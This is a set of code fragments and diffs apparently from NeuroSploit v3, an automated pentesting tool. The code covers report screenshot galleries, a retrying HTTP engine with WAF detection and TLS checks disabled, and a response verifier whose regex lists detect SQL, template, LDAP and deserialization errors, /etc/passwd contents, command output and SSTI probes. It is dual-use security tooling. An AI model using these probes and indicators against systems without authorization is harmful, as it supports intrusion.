if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for ss_file in sorted(finding_dir.glob("*.png"))[:5]:
data_uri = self._embed_screenshot(str(ss_file))
if data_uri:
data_uris.append(data_uri)
if not data_uris:
return ""
cards = ""
for i, data_uri in enumerate(data_uris[:5]):
caption = "Evidence Capture" if i == 0 else f"Screenshot {i + 1}"
cards += f"""
<div class="screenshot-card">
<img src="{data_uri}" alt="{caption}" />
<div class="screenshot-caption">{caption}</div>
</div>"""
return f'<div class="screenshot-grid">{cards}</div>'
    def _embed_screenshot(self, filepath: str) -> str:
        """Convert a screenshot file to a base64 data URI.

        Returns an empty string when the file is missing or unreadable so that
        callers can simply skip blank results without error handling.
        """
        path = Path(filepath)
        if not path.exists():
            return ""
        try:
            with open(path, 'rb') as f:
                data = base64.b64encode(f.read()).decode('ascii')
                # Callers only glob *.png, so the PNG MIME type is always correct.
                return f"data:image/png;base64,{data}"
        except Exception:
            # Best-effort: a corrupt screenshot must not break report generation.
            return ""
    def _copy_screenshots_to_report(self, vulnerabilities: List[Vulnerability], report_dir: Path) -> None:
        """Copy vulnerability screenshots into the per-report folder.

        For each vulnerability, looks for captured PNGs under the scan-scoped
        directory (reports/screenshots/{scan_id}/{finding_id}/) first, then the
        legacy flat layout (reports/screenshots/{finding_id}/), and copies them
        to {report_dir}/screenshots/{finding_id}/.
        """
        import shutil
        import hashlib
        screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
        screenshots_dest = report_dir / "screenshots"
        for vuln in vulnerabilities:
            # Use same finding_id as agent: md5(vuln_type+url+param)[:8]
            # (must stay in sync with the capture side, or lookups miss).
            vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
            vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
            vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
            finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
            # Check scan-scoped path first, then legacy
            src_dir = None
            if self._scan_id:
                scan_src = screenshots_base / self._scan_id / finding_id
                if scan_src.exists():
                    src_dir = scan_src
            if not src_dir:
                legacy_src = screenshots_base / finding_id
                if legacy_src.exists():
                    src_dir = legacy_src
            if src_dir:
                dest_dir = screenshots_dest / finding_id
                dest_dir.mkdir(parents=True, exist_ok=True)
                for ss_file in src_dir.glob("*.png"):
                    shutil.copy2(ss_file, dest_dir / ss_file.name)
def _build_screenshots_gallery(self, vulnerabilities: List[Vulnerability]) -> str:
    """Build a dedicated Screenshots & Evidence gallery section for the report.

    Screenshots for each vulnerability are gathered from two sources, in order:
      1. Inline base64 data URIs stored on the vulnerability record (DB).
      2. PNG files on disk under reports/screenshots/, keyed by the same
         md5-based finding id the agent uses (scan-scoped directory first,
         then the legacy flat layout).

    Returns "" when no vulnerability has any screenshot, so callers can
    drop the section entirely.
    """
    import hashlib
    gallery_items = []
    for vuln in vulnerabilities:
        vuln_screenshots = []
        # Source 1: base64 from DB
        inline = getattr(vuln, 'screenshots', None) or []
        for ss in inline:
            # Only accept well-formed data URIs; anything else is ignored
            if isinstance(ss, str) and ss.startswith("data:image/"):
                vuln_screenshots.append(ss)
        # Source 2: filesystem (scan-scoped first, then legacy)
        if not vuln_screenshots:
            # Recreate the agent's finding id: md5(vuln_type+url+param)[:8]
            vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
            vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
            vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
            finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
            screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
            finding_dir = None
            if self._scan_id:
                scan_dir = screenshots_base / self._scan_id / finding_id
                if scan_dir.exists():
                    finding_dir = scan_dir
            if not finding_dir:
                legacy_dir = screenshots_base / finding_id
                if legacy_dir.exists():
                    finding_dir = legacy_dir
            if finding_dir:
                # Cap at 5 screenshots per finding to keep report size bounded
                for ss_file in sorted(finding_dir.glob("*.png"))[:5]:
                    data_uri = self._embed_screenshot(str(ss_file))
                    if data_uri:
                        vuln_screenshots.append(data_uri)
        if vuln_screenshots:
            # Escape the title before embedding it in HTML
            title = self._escape_html(getattr(vuln, 'title', 'Unknown'))
            severity = getattr(vuln, 'severity', 'info')
            color = self.SEVERITY_COLORS.get(severity, '#6c757d')
            images_html = ""
            for i, data_uri in enumerate(vuln_screenshots[:5]):
                images_html += f"""
            <div class="screenshot-card">
                <img src="{data_uri}" alt="Evidence {i+1}" />
                <div class="screenshot-caption">Evidence {i+1}</div>
            </div>"""
            gallery_items.append(f"""
        <div style="margin-bottom: 1.5rem;">
            <h4 style="color: {color}; margin-bottom: 0.5rem;">{title}</h4>
            <div class="screenshot-grid">{images_html}</div>
        </div>""")
    if not gallery_items:
        return ""
    return f"""
    <div class="section">
        <h2>Screenshots &amp; Evidence</h2>
        <p style="color: var(--text-secondary); margin-bottom: 1rem;">Visual evidence captured during vulnerability validation.</p>
        {''.join(gallery_items)}
    </div>"""
def _build_rejected_findings_section(self, rejected_vulns: List) -> str:
    """Build an HTML section for AI-rejected findings that need manual review.

    Each rejected finding is rendered as a dimmed card showing its severity,
    endpoint, optional PoC payload, and the AI's rejection reason so a human
    pentester can confirm or override the false-positive decision.

    Returns "" when there are no rejected findings.
    """
    if not rejected_vulns:
        return ""
    items = ""
    for vuln in rejected_vulns:
        # Fall back to a neutral gray for unknown severities
        color = self.SEVERITY_COLORS.get(vuln.severity, "#6c757d")
        # Escape scanner/model-produced text before embedding it in HTML
        reason = self._escape_html(getattr(vuln, 'ai_rejection_reason', '') or 'No reason provided')
        items += f"""
        <div style="border: 1px solid #555; border-left: 3px solid {color}; border-radius: 8px; padding: 12px; margin-bottom: 8px; opacity: 0.7; background: rgba(255,165,0,0.05);">
            <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 8px;">
                <div style="display: flex; align-items: center; gap: 8px;">
                    <span style="background-color: {color}; color: white; padding: 2px 8px; border-radius: 4px; font-size: 0.75rem; font-weight: bold;">{vuln.severity.upper()}</span>
                    <strong>{self._escape_html(vuln.title)}</strong>
                </div>
                <span style="background: rgba(255,165,0,0.2); color: #ffa500; padding: 2px 8px; border-radius: 12px; font-size: 0.7rem;">AI Rejected</span>
            </div>
            <p style="color: #aaa; font-size: 0.85rem; margin: 4px 0;"><strong>Endpoint:</strong> {self._escape_html(vuln.affected_endpoint or 'N/A')}</p>
            {f'<p style="color: #aaa; font-size: 0.85rem; margin: 4px 0;"><strong>Payload:</strong> <code>{self._escape_html(vuln.poc_payload or "")}</code></p>' if vuln.poc_payload else ''}
            <p style="color: #ffa500; font-size: 0.8rem; margin: 8px 0 0 0; padding: 8px; background: rgba(255,165,0,0.1); border-radius: 4px;"><strong>Rejection Reason:</strong> {reason}</p>
        </div>
        """
    return f"""
    <div class="section" style="border: 1px dashed #ffa500; border-radius: 12px; padding: 20px; margin-top: 20px;">
        <h2 style="color: #ffa500;">AI-Rejected Findings ({len(rejected_vulns)}) - Manual Review Required</h2>
        <p style="color: var(--text-secondary); margin-bottom: 1rem;">
            The following potential findings were rejected by AI analysis as likely false positives.
            Manual pentester review is recommended to confirm or override these decisions.
        </p>
        {items}
    </div>"""
def _build_tools_section(self) -> str:
    """Build an HTML section listing tools that were executed during the scan.

    Renders one card per entry in self._tool_executions with the command,
    duration, findings count, exit status (green for 0, red otherwise) and
    a truncated stdout preview.

    Returns "" when no tools were executed.
    """
    if not self._tool_executions:
        return ""
    rows = ""
    for te in self._tool_executions:
        # Escape every tool-supplied string before embedding it in HTML
        tool = self._escape_html(te.get("tool", "unknown"))
        command = self._escape_html(te.get("command", ""))
        duration = te.get("duration", 0)
        findings = te.get("findings_count", 0)
        exit_code = te.get("exit_code", 0)
        # Cap the stdout preview to keep the report compact
        stdout = self._escape_html(te.get("stdout_preview", "")[:500])
        status_color = "#28a745" if exit_code == 0 else "#dc3545"
        rows += f"""
        <div class="vuln-card" style="margin-bottom: 1rem;">
            <div class="vuln-header" style="padding: 15px;">
                <span class="severity-badge" style="background-color: #6c63ff; font-size: 0.75em;">{tool.upper()}</span>
                <h3 style="font-size: 0.95em;">{command}</h3>
            </div>
            <div class="vuln-meta">
                <span><strong>Duration:</strong> {duration}s</span>
                <span><strong>Findings:</strong> {findings}</span>
                <span style="color: {status_color};"><strong>Exit:</strong> {exit_code}</span>
            </div>
            {f'<div style="padding: 15px;"><div class="code-block"><pre>{stdout}</pre></div></div>' if stdout else ''}
        </div>"""
    return f"""
    <div class="section">
        <h2>Tools Executed</h2>
        <p style="color: var(--text-secondary); margin-bottom: 1rem;">Security tools executed during the automated assessment.</p>
        {rows}
    </div>"""
def _escape_html(self, text: str) -> str:
"""Escape HTML special characters"""
if not text:
+135 -1
View File
@@ -4,11 +4,12 @@ Generates beautiful, comprehensive security assessment reports
"""
import json
import base64
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Any, Optional
from dataclasses import dataclass
import html
import base64
@dataclass
@@ -455,6 +456,70 @@ class HTMLReportGenerator:
.card {{
animation: fadeIn 0.3s ease;
}}
/* Screenshot grid */
.screenshot-grid {{
display: grid;
grid-template-columns: repeat(auto-fit, minmax(320px, 1fr));
gap: 16px;
margin-top: 12px;
}}
.screenshot-card {{
border: 1px solid {border_color};
border-radius: 8px;
overflow: hidden;
background: {'#0f172a' if is_dark else '#f1f5f9'};
transition: transform 0.2s, box-shadow 0.2s;
}}
.screenshot-card:hover {{
transform: translateY(-2px);
box-shadow: 0 4px 16px rgba(0,0,0,0.3);
}}
.screenshot-card img {{
width: 100%;
height: auto;
display: block;
cursor: pointer;
}}
.screenshot-caption {{
padding: 8px 12px;
font-size: 0.75rem;
color: {text_muted};
text-align: center;
border-top: 1px solid {border_color};
text-transform: uppercase;
letter-spacing: 0.05em;
}}
/* Screenshot modal (fullscreen view) */
.screenshot-modal {{
display: none;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0,0,0,0.9);
z-index: 10000;
justify-content: center;
align-items: center;
cursor: pointer;
}}
.screenshot-modal.active {{
display: flex;
}}
.screenshot-modal img {{
max-width: 90%;
max-height: 90%;
border-radius: 8px;
box-shadow: 0 8px 32px rgba(0,0,0,0.5);
}}
</style>"""
def _get_scripts(self) -> str:
@@ -495,6 +560,29 @@ class HTMLReportGenerator:
function printReport() {
window.print();
}
// Screenshot zoom modal
(function() {
var modal = document.createElement('div');
modal.className = 'screenshot-modal';
modal.innerHTML = '<img />';
document.body.appendChild(modal);
document.addEventListener('click', function(e) {
if (e.target.closest('.screenshot-card img')) {
var src = e.target.src;
modal.querySelector('img').src = src;
modal.classList.add('active');
}
if (e.target.closest('.screenshot-modal')) {
modal.classList.remove('active');
}
});
document.addEventListener('keydown', function(e) {
if (e.key === 'Escape') modal.classList.remove('active');
});
})();
</script>"""
def _generate_header(self, session_data: Dict) -> str:
@@ -770,6 +858,7 @@ class HTMLReportGenerator:
<h4>Evidence / Proof of Concept</h4>
<div class="evidence-box">{html.escape(finding.get('evidence', ''))}</div>
</div>''' if finding.get('evidence') else ''}
{self._generate_screenshots_html(finding)}
{f'''<div class="finding-section">
<h4>Impact</h4>
<p>{html.escape(finding.get('impact', ''))}</p>
@@ -852,6 +941,51 @@ class HTMLReportGenerator:
</ul>
</div>'''
def _generate_screenshots_html(self, finding: Dict) -> str:
"""Generate screenshot grid HTML for a finding.
Supports two sources:
1. finding['screenshots'] list with base64 data URIs (from agent capture)
2. Filesystem lookup in reports/screenshots/{finding_id}/ (from BrowserValidator)
"""
screenshots = finding.get('screenshots', [])
# Also check filesystem for screenshots stored by BrowserValidator
finding_id = finding.get('id', '')
if finding_id and not screenshots:
ss_dir = Path('reports/screenshots') / finding_id
if ss_dir.exists():
for ss_file in sorted(ss_dir.glob('*.png'))[:5]:
try:
with open(ss_file, 'rb') as f:
data = base64.b64encode(f.read()).decode('ascii')
screenshots.append(f"data:image/png;base64,{data}")
except Exception:
pass
if not screenshots:
return ''
cards = ''
for i, ss in enumerate(screenshots[:5]): # Cap at 5 screenshots
label = f"Screenshot {i + 1}"
if i == 0:
label = "Evidence Capture"
elif i == 1:
label = "Exploitation Proof"
cards += f'''
<div class="screenshot-card">
<img src="{ss}" alt="{label}" loading="lazy" />
<div class="screenshot-caption">{label}</div>
</div>'''
return f'''
<div class="finding-section">
<h4>Screenshots</h4>
<div class="screenshot-grid">{cards}</div>
</div>'''
def _generate_scan_results(self, scan_results: List[Dict]) -> str:
"""Generate tool scan results section"""
if not scan_results:
+377
View File
@@ -0,0 +1,377 @@
"""
NeuroSploit v3 - Resilient Request Engine
Wraps aiohttp session with retry, rate limiting, circuit breaker,
and error classification for autonomous pentesting.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Dict, Optional, Any
logger = logging.getLogger(__name__)
class ErrorType(Enum):
    """Classification buckets for the outcome of an HTTP request attempt."""
    SUCCESS = "success"                    # 2xx/3xx responses
    CLIENT_ERROR = "client_error"          # 4xx (not 429)
    RATE_LIMITED = "rate_limited"          # 429
    WAF_BLOCKED = "waf_blocked"            # 403 + WAF indicators
    SERVER_ERROR = "server_error"          # 5xx
    TIMEOUT = "timeout"                    # request exceeded its timeout
    CONNECTION_ERROR = "connection_error"  # DNS/socket/TLS level failure
@dataclass
class RequestResult:
    """Outcome of a single (possibly retried) HTTP request."""
    status: int                # HTTP status code; 0 when no response was received
    body: str                  # decoded response body ("" on total failure)
    headers: Dict[str, str]    # response headers (empty dict on total failure)
    url: str                   # final URL (after redirects, when followed)
    error_type: ErrorType = ErrorType.SUCCESS  # classified outcome of the request
    retry_count: int = 0       # how many attempts were consumed before returning
    response_time: float = 0.0 # seconds taken by the last attempt
@dataclass
class HostState:
    """Per-host tracking for rate limiting and circuit breaker."""
    host: str                       # netloc this state applies to
    request_count: int = 0          # total requests sent to this host
    error_count: int = 0            # total failed requests to this host
    consecutive_failures: int = 0   # failure streak; trips the circuit breaker
    last_request_time: float = 0.0  # time.time() of the last completed attempt
    delay: float = 0.1              # current inter-request delay (doubled on 429)
    circuit_open: bool = False      # True while the breaker rejects new requests
    circuit_open_time: float = 0.0  # time.time() when the breaker opened
    avg_response_time: float = 0.0  # rolling mean of recent response times
    # Adaptive timeout
    _response_times: list = field(default_factory=list)  # recent samples, trimmed to ~30
class RequestEngine:
    """Resilient HTTP request engine with retry, rate limiting, and circuit breaker.

    Wraps an aiohttp ClientSession; all tuning state is kept per-host.

    Features:
    - Error classification (7 types, see ErrorType)
    - Smart retry with exponential backoff (1s, 2s, 4s) on 5xx/timeout/connection
    - No retry on 4xx client errors
    - Per-host rate limiting with auto-increase on 429
    - Circuit breaker: N consecutive failures -> open circuit for cooldown period
    - Adaptive timeouts based on target response times
    - Request counting and statistics
    - Cancel-aware (checks is_cancelled before each request)
    """

    # Case-insensitive substrings that mark a 403 body as a WAF/CDN block page.
    WAF_INDICATORS = [
        "cloudflare", "incapsula", "sucuri", "akamai", "imperva",
        "mod_security", "modsecurity", "request blocked", "access denied",
        "waf", "web application firewall", "barracuda", "fortinet",
        "f5 big-ip", "citrix", "azure firewall",
    ]

    def __init__(
        self,
        session,  # aiohttp.ClientSession
        default_delay: float = 0.1,
        max_retries: int = 3,
        circuit_threshold: int = 5,
        circuit_timeout: float = 30.0,
        default_timeout: float = 10.0,
        is_cancelled_fn: Optional[Callable] = None,
    ):
        """
        Args:
            session: open aiohttp.ClientSession used for every request.
            default_delay: initial per-host inter-request delay (seconds).
            max_retries: extra attempts allowed per request on retryable errors.
            circuit_threshold: consecutive failures before the breaker opens.
            circuit_timeout: cooldown (seconds) before a half-open probe.
            default_timeout: timeout used until enough response samples exist.
            is_cancelled_fn: optional callable polled to abort work early.
        """
        self.session = session
        self.default_delay = default_delay
        self.max_retries = max_retries
        self.circuit_threshold = circuit_threshold
        self.circuit_timeout = circuit_timeout
        self.default_timeout = default_timeout
        self.is_cancelled = is_cancelled_fn or (lambda: False)
        # Per-host state
        self._hosts: Dict[str, HostState] = {}
        # Global stats (errors_by_type also counts SUCCESS outcomes)
        self.total_requests = 0
        self.total_errors = 0
        self.errors_by_type: Dict[str, int] = {e.value: 0 for e in ErrorType}

    def _get_host(self, url: str) -> HostState:
        """Get or create host state."""
        from urllib.parse import urlparse
        host = urlparse(url).netloc
        if host not in self._hosts:
            self._hosts[host] = HostState(host=host, delay=self.default_delay)
        return self._hosts[host]

    def _classify_error(self, status: int, body: str, exception: Optional[Exception] = None) -> ErrorType:
        """Classify response/error into ErrorType.

        Exception (when given) wins over the status code; a 403 only counts
        as WAF_BLOCKED when the body contains a known WAF indicator string.
        """
        if exception:
            exc_name = type(exception).__name__.lower()
            if "timeout" in exc_name or "timedout" in exc_name:
                return ErrorType.TIMEOUT
            return ErrorType.CONNECTION_ERROR
        if 200 <= status < 400:
            return ErrorType.SUCCESS
        if status == 429:
            return ErrorType.RATE_LIMITED
        if status == 403:
            body_lower = body.lower() if body else ""
            if any(w in body_lower for w in self.WAF_INDICATORS):
                return ErrorType.WAF_BLOCKED
            return ErrorType.CLIENT_ERROR
        if 400 <= status < 500:
            return ErrorType.CLIENT_ERROR
        if status >= 500:
            return ErrorType.SERVER_ERROR
        # 1xx and other unexpected statuses fall through as SUCCESS
        return ErrorType.SUCCESS

    def _should_retry(self, error_type: ErrorType) -> bool:
        """Determine if this error type warrants retry."""
        return error_type in (
            ErrorType.SERVER_ERROR,
            ErrorType.TIMEOUT,
            ErrorType.CONNECTION_ERROR,
            ErrorType.RATE_LIMITED,
        )

    def _get_backoff_delay(self, attempt: int, error_type: ErrorType) -> float:
        """Calculate exponential backoff delay for the given attempt number."""
        if error_type == ErrorType.RATE_LIMITED:
            return min(30.0, 2.0 * (2 ** attempt))  # Longer for rate limiting
        return min(10.0, 1.0 * (2 ** attempt))  # 1s, 2s, 4s, ...

    def _get_adaptive_timeout(self, host_state: HostState) -> float:
        """Calculate adaptive timeout based on target response history."""
        if not host_state._response_times:
            return self.default_timeout
        avg = sum(host_state._response_times[-20:]) / len(host_state._response_times[-20:])
        # 3x average with min 5s, max 30s
        return max(5.0, min(30.0, avg * 3.0))

    def _check_circuit(self, host_state: HostState) -> bool:
        """Check if circuit breaker allows request. Returns True if allowed."""
        if not host_state.circuit_open:
            return True
        # Check if cooldown has passed
        elapsed = time.time() - host_state.circuit_open_time
        if elapsed >= self.circuit_timeout:
            # Half-open: allow one test request
            host_state.circuit_open = False
            host_state.consecutive_failures = 0
            logger.debug(f"Circuit half-open for {host_state.host}")
            return True
        return False

    def _update_circuit(self, host_state: HostState, error_type: ErrorType):
        """Update circuit breaker state after a request.

        Any success fully resets the breaker; only transport-level failures
        (5xx/timeout/connection) count toward opening it.
        """
        if error_type == ErrorType.SUCCESS:
            host_state.consecutive_failures = 0
            host_state.circuit_open = False
        elif error_type in (ErrorType.SERVER_ERROR, ErrorType.TIMEOUT, ErrorType.CONNECTION_ERROR):
            host_state.consecutive_failures += 1
            if host_state.consecutive_failures >= self.circuit_threshold:
                host_state.circuit_open = True
                host_state.circuit_open_time = time.time()
                logger.warning(f"Circuit OPEN for {host_state.host} after {host_state.consecutive_failures} failures")

    async def request(
        self,
        url: str,
        method: str = "GET",
        params: Optional[Dict] = None,
        data: Optional[Any] = None,
        headers: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
        allow_redirects: bool = False,
        timeout: Optional[float] = None,
        json_data: Optional[Dict] = None,
    ) -> Optional[RequestResult]:
        """Make an HTTP request with retry, rate limiting, and circuit breaker.

        Args:
            url: target URL; per-host state is keyed on its netloc.
            method: HTTP verb (default GET).
            params/data/headers/cookies/json_data: forwarded to aiohttp.
            allow_redirects: follow redirects when True (default False).
            timeout: explicit timeout in seconds; otherwise adaptive.

        Returns RequestResult on success (even 4xx), None when cancelled.
        A status of 0 in the result means no response was ever received.
        """
        if self.is_cancelled():
            return None
        host_state = self._get_host(url)
        # Circuit breaker check
        if not self._check_circuit(host_state):
            logger.debug(f"Circuit open for {host_state.host}, skipping")
            return RequestResult(
                status=0, body="", headers={}, url=url,
                error_type=ErrorType.CONNECTION_ERROR
            )
        # Rate limiting: wait per-host delay
        now = time.time()
        elapsed = now - host_state.last_request_time
        if elapsed < host_state.delay:
            await asyncio.sleep(host_state.delay - elapsed)
        # Determine timeout
        req_timeout = timeout or self._get_adaptive_timeout(host_state)
        # Retry loop
        last_error_type = ErrorType.CONNECTION_ERROR
        for attempt in range(self.max_retries + 1):
            if self.is_cancelled():
                return None
            start_time = time.time()
            try:
                import aiohttp
                kwargs = {
                    "method": method,
                    "url": url,
                    "allow_redirects": allow_redirects,
                    "timeout": aiohttp.ClientTimeout(total=req_timeout),
                    # TLS verification intentionally disabled for pentest targets
                    "ssl": False,
                }
                # NOTE(review): falsy values (e.g. data="" or params={}) are not
                # forwarded — confirm this is intended for empty-body requests.
                if params:
                    kwargs["params"] = params
                if data:
                    kwargs["data"] = data
                if json_data:
                    kwargs["json"] = json_data
                if headers:
                    kwargs["headers"] = headers
                if cookies:
                    kwargs["cookies"] = cookies
                async with self.session.request(**kwargs) as resp:
                    body = await resp.text()
                    resp_time = time.time() - start_time
                    resp_headers = dict(resp.headers)
                    status = resp.status
                    # Track response time (keep a bounded window of samples)
                    host_state._response_times.append(resp_time)
                    if len(host_state._response_times) > 50:
                        host_state._response_times = host_state._response_times[-30:]
                    host_state.avg_response_time = sum(host_state._response_times) / len(host_state._response_times)
                    # Classify
                    error_type = self._classify_error(status, body)
                    last_error_type = error_type
                    # Update stats
                    self.total_requests += 1
                    host_state.request_count += 1
                    host_state.last_request_time = time.time()
                    self.errors_by_type[error_type.value] = self.errors_by_type.get(error_type.value, 0) + 1
                    # Update circuit breaker
                    self._update_circuit(host_state, error_type)
                    # Handle rate limiting
                    if error_type == ErrorType.RATE_LIMITED:
                        # Check Retry-After header (seconds form only; HTTP-date is ignored)
                        retry_after = resp_headers.get("Retry-After", "")
                        if retry_after.isdigit():
                            wait = min(60.0, float(retry_after))
                        else:
                            wait = self._get_backoff_delay(attempt, error_type)
                        # Increase per-host delay
                        host_state.delay = min(5.0, host_state.delay * 2)
                        logger.debug(f"Rate limited on {host_state.host}, delay now {host_state.delay:.1f}s")
                        if attempt < self.max_retries:
                            await asyncio.sleep(wait)
                            continue
                    # Retry on server errors
                    if self._should_retry(error_type) and attempt < self.max_retries:
                        wait = self._get_backoff_delay(attempt, error_type)
                        logger.debug(f"Retry {attempt+1}/{self.max_retries} for {url} ({error_type.value}), wait {wait:.1f}s")
                        await asyncio.sleep(wait)
                        continue
                    # Return result (success or non-retryable error)
                    if error_type != ErrorType.SUCCESS:
                        self.total_errors += 1
                        host_state.error_count += 1
                    return RequestResult(
                        status=status,
                        body=body,
                        headers=resp_headers,
                        url=str(resp.url),
                        error_type=error_type,
                        retry_count=attempt,
                        response_time=resp_time,
                    )
            except asyncio.TimeoutError:
                resp_time = time.time() - start_time
                last_error_type = ErrorType.TIMEOUT
                self.total_requests += 1
                self.total_errors += 1
                host_state.request_count += 1
                host_state.error_count += 1
                host_state.last_request_time = time.time()
                self.errors_by_type["timeout"] = self.errors_by_type.get("timeout", 0) + 1
                self._update_circuit(host_state, ErrorType.TIMEOUT)
                if attempt < self.max_retries:
                    wait = self._get_backoff_delay(attempt, ErrorType.TIMEOUT)
                    logger.debug(f"Timeout on {url}, retry {attempt+1}/{self.max_retries}")
                    await asyncio.sleep(wait)
                    continue
            except Exception as e:
                resp_time = time.time() - start_time
                error_type = self._classify_error(0, "", e)
                last_error_type = error_type
                self.total_requests += 1
                self.total_errors += 1
                host_state.request_count += 1
                host_state.error_count += 1
                host_state.last_request_time = time.time()
                self.errors_by_type[error_type.value] = self.errors_by_type.get(error_type.value, 0) + 1
                self._update_circuit(host_state, error_type)
                if self._should_retry(error_type) and attempt < self.max_retries:
                    wait = self._get_backoff_delay(attempt, error_type)
                    logger.debug(f"Error on {url}: {e}, retry {attempt+1}")
                    await asyncio.sleep(wait)
                    continue
                logger.debug(f"Request failed after {attempt+1} attempts: {url} - {e}")
        # All retries exhausted
        return RequestResult(
            status=0, body="", headers={}, url=url,
            error_type=last_error_type, retry_count=self.max_retries,
        )

    def get_stats(self) -> Dict:
        """Get request statistics, global and broken down per host."""
        host_stats = {}
        for host, state in self._hosts.items():
            host_stats[host] = {
                "requests": state.request_count,
                "errors": state.error_count,
                "avg_response_time": round(state.avg_response_time, 3),
                "delay": round(state.delay, 3),
                "circuit_open": state.circuit_open,
                "consecutive_failures": state.consecutive_failures,
            }
        return {
            "total_requests": self.total_requests,
            "total_errors": self.total_errors,
            "errors_by_type": dict(self.errors_by_type),
            "hosts": host_stats,
        }

    def reset_stats(self):
        """Reset all statistics and per-host state (delays, circuits)."""
        self.total_requests = 0
        self.total_errors = 0
        self.errors_by_type = {e.value: 0 for e in ErrorType}
        self._hosts.clear()
+780
View File
@@ -0,0 +1,780 @@
"""
NeuroSploit v3 - XBOW-Inspired Response Verification Framework
Multi-signal verification system that confirms vulnerabilities
through 4 independent signals, reducing false positives dramatically.
Inspired by XBOW benchmark methodology:
- Binary verification (flag-based in CTF, evidence-based here)
- Health checks before testing
- Baseline diffing for behavioral anomaly detection
- Multi-signal confirmation (2+ signals = confirmed without AI)
"""
import re
import hashlib
from typing import Dict, List, Optional, Tuple, Any
# ---------------------------------------------------------------------------
# Error / indicator patterns used across multiple checkers
# All regex lists below are compiled with re.IGNORECASE by ResponseVerifier.
# ---------------------------------------------------------------------------
# SQL error signatures across common DB engines (MySQL, PostgreSQL, SQLite,
# Oracle, MSSQL, ODBC/JDBC).
DB_ERROR_PATTERNS = [
    r"(?:sql|database|query)\s*(?:error|syntax|exception)",
    r"mysql_(?:fetch|query|num_rows|connect)",
    r"mysqli_",
    r"pg_(?:query|exec|prepare|connect)",
    r"sqlite3?\.\w+error",
    r"ora-\d{4,5}",
    r"mssql_query",
    r"sqlstate\[",
    r"odbc\s+driver",
    r"jdbc\s+exception",
    r"unclosed\s+quotation",
    r"you have an error in your sql",
    r"syntax error.*at line \d+",
]
# Template-engine exception signatures (Jinja2, Mako, Twig, FreeMarker, ...).
TEMPLATE_ERROR_PATTERNS = [
    r"jinja2\.exceptions\.\w+",
    r"mako\.exceptions\.\w+",
    r"twig.*error",
    r"freemarker.*error",
    r"smarty.*error",
    r"django\.template\.\w+",
    r"template syntax error",
]
# Literal substrings proving local file disclosure (/etc/passwd, boot.ini).
FILE_CONTENT_MARKERS = [
    "root:x:0:0:",
    "daemon:x:1:1:",
    "bin:x:2:2:",
    "www-data:",
    "[boot loader]",
    "[operating systems]",
    "[extensions]",
]
# SSTI probes mapped to what an evaluating template renders them as
# (note: 7*'7' is Python string repetition -> "7777777").
SSTI_EVALUATIONS = {
    "7*7": "49",
    "7*'7'": "7777777",
    "3*3": "9",
}
# Regexes matching typical shell command output (id, /etc/passwd, uname, ls).
COMMAND_OUTPUT_MARKERS = [
    r"uid=\d+\(",
    r"gid=\d+\(",
    r"root:\w+:0:0:",
    r"/bin/(?:ba)?sh",
    r"Linux\s+\S+\s+\d+\.\d+",
    r"total\s+\d+\s*\n",
]
# MongoDB / Mongoose error signatures and leaked query operators.
NOSQL_ERROR_PATTERNS = [
    r"MongoError",
    r"mongo.*(?:syntax|parse|query).*error",
    r"\$(?:gt|lt|ne|in|nin|regex|where|exists)\b",
    r"CastError.*ObjectId",
    r"BSONTypeError",
    r"operator.*\$(?:gt|lt|ne|regex)",
]
# LDAP filter-parsing error signatures (JNDI, php ldap_search, ...).
LDAP_ERROR_PATTERNS = [
    r"javax\.naming\.(?:directory\.)?InvalidSearchFilterException",
    r"Bad search filter",
    r"ldap_search.*error",
    r"invalid.*(?:dn|distinguished name|ldap filter)",
    r"unbalanced.*parenthes[ei]s",
    r"NamingException",
]
# XPath evaluation error signatures (libxml, DOMXPath, SimpleXML).
XPATH_ERROR_PATTERNS = [
    r"XPathException",
    r"Invalid XPath",
    r"xmlXPathEval.*error",
    r"DOMXPath.*(?:evaluate|query).*error",
    r"SimpleXMLElement.*xpath",
    r"unterminated.*(?:string|expression).*xpath",
    r"XPATH syntax error",
]
# GraphQL parser/validator error signatures.
GRAPHQL_ERROR_PATTERNS = [
    r'"errors"\s*:\s*\[',
    r"Syntax Error.*GraphQL",
    r"Cannot query field",
    r"Unknown argument",
    r"Expected Name",
    r"graphql.*parse.*error",
]
# Unsafe deserialization error signatures (Java, PHP unserialize, pickle, YAML).
DESERIALIZATION_ERROR_PATTERNS = [
    r"java\.io\.(?:InvalidClass|StreamCorrupted)Exception",
    r"ClassNotFoundException",
    r"unserialize\(\).*error",
    r"pickle\.UnpicklingError",
    r"yaml\.(?:scanner|parser)\.ScannerError",
    r"__wakeup\(\).*failed",
    r"ObjectInputStream",
    r"readObject\(\).*exception",
]
# Expression-language injection signatures (Java EL, SpEL, OGNL).
EL_INJECTION_PATTERNS = [
    r"javax\.el\.ELException",
    r"org\.springframework\.expression\.spel",
    r"EL Expression.*error",
    r"OGNL.*exception",
]
# ---------------------------------------------------------------------------
# Health checking
# ---------------------------------------------------------------------------
# Lowercase substrings that indicate a target is down or in maintenance;
# matched against the lowercased body before any vulnerability testing.
UNHEALTHY_PATTERNS = [
    "502 bad gateway",
    "503 service unavailable",
    "service unavailable",
    "maintenance mode",
    "under maintenance",
    "temporarily unavailable",
    "server is starting",
    "connection refused",
]
class ResponseVerifier:
"""
Multi-signal verification framework for vulnerability confirmation.
4 independent signals are checked:
1. VulnEngine tester pattern match (structured analyze_response)
2. Baseline diff (status / length / hash change)
